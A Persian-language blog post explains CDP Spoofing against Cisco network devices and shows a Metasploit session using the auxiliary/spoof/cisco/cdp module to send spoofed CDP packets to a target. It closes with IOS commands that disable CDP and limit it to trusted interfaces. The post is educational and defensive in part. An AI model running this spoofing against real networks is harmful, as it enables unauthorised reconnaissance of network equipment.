amirhoseintangsirinet
amirhoseintangsirinet
خواندن ۴ دقیقه·۴ سال پیش

CDP Spoofing چیست

ایجاد حملات بر روی پروتکل CDP) Cisco Discovery Protocol)

نویسنده: امیرحسین تنگسیری نژاد

بررسی پروتکل CDP

مخفف Cisco Discovery Protocol معنای پروتکل شناسایی سیسکو می باشد پروتکلی درون شبکه های کامپیوتری که توسط شرکت سیسکو به منظور کشف آسان تر همسایگان، تبلیغ اطلاعات مختلف همانند Software Version و IP Address توسط روترها،سوییچ ها و تجهیزات دیگر. این پروتکل در لایه دوم استاندارد OSI یعنی Data-Link کار میکند

بررسی حمله به پروتکل CDP

حمله‌ایی درون شبکه های کامپیوتری وجود دارد تحت عنوان CDP Spoofing در این حمله فرد مهاجم با ارسال پیغام های CDP سوییچ ها و روترها و تجهیزات شبکه را وادار به ارسال اطلاعات حیاطی خود به سمت فرد مهاجم می‌سازد. این پیغام ها به صورت Broadcast درون شبکه ارسال می‌شوند تا میزبان های فعال جواب را ارسال کنند

پیاده سازی حمله CDP Spoofing برروی پروتکل CDP

این حمله در Metasploit با استفاده از ماژول cdp به شکل زیر قابل انجام می‌باشد

msf5 auxiliary(spoof/cisco/cdp) > back msf5 > use auxiliary/spoof/cisco/cdp msf5 auxiliary(spoof/cisco/cdp) > show options Module options (auxiliary/spoof/cisco/cdp): Name Current Setting Required Description ---- --------------- -------- ----------- DEVICE_ID SEP00070EEA3156 yes Device ID (e.g. SIP00070EEA3156) FULL_DUPLEX true yes True iff full-duplex, false otherwise INTERFACE lo no The name of the interface PLATFORM Cisco IP Phone 7975 yes Platform of the device PORT Port 1 yes The CDP 'sent through interface' value RHOSTS 127.0.0.1 yes The target address range or CIDR identifier SMAC no MAC Address for MAC Spoofing SOFTWARE SCCP75.9-3-1SR2-1S yes Software of the device VTPDOMAIN no VTP Domain Auxiliary action: Name Description ---- ----------- Spoof Sends CDP packets msf5 auxiliary(spoof/cisco/cdp) > set INTERFACE eth0 INTERFACE => eth0 msf5 auxiliary(spoof/cisco/cdp) > set RHOSTS 192.168.43.10 RHOSTS => 192.168.43.10 msf5 auxiliary(spoof/cisco/cdp) > exploit [*] Sending CDP messages on eth0

نکته: می‌بایست از یک TcpDump همانند Wireshark به منظور دیدن Response تجهیزات استفاده کنید.

ایمن سازی Device از این حمله

به صورت Default پروتکل CDP بر روی کل رابط های( Interfaces ) دستگاه فعال می باشد. به منظور جلوگیری از این حمله ابتدا CDP را غیرفعال می‌سازیم و بعد آن را فقد بر روی Interface های که متصل به یک Device خاص همانند روتر/سوییچ/سرور فعال می‌سازیم

SW#enable SW#configure terminal SW(config)#no cdp run SW#(config)#interface ethernet 0/0 SW#(config-if)#cdp enable


ciscoامنیت شبکهامنیت سایبریcdpattack
شاید از این پست‌ها خوشتان بیاید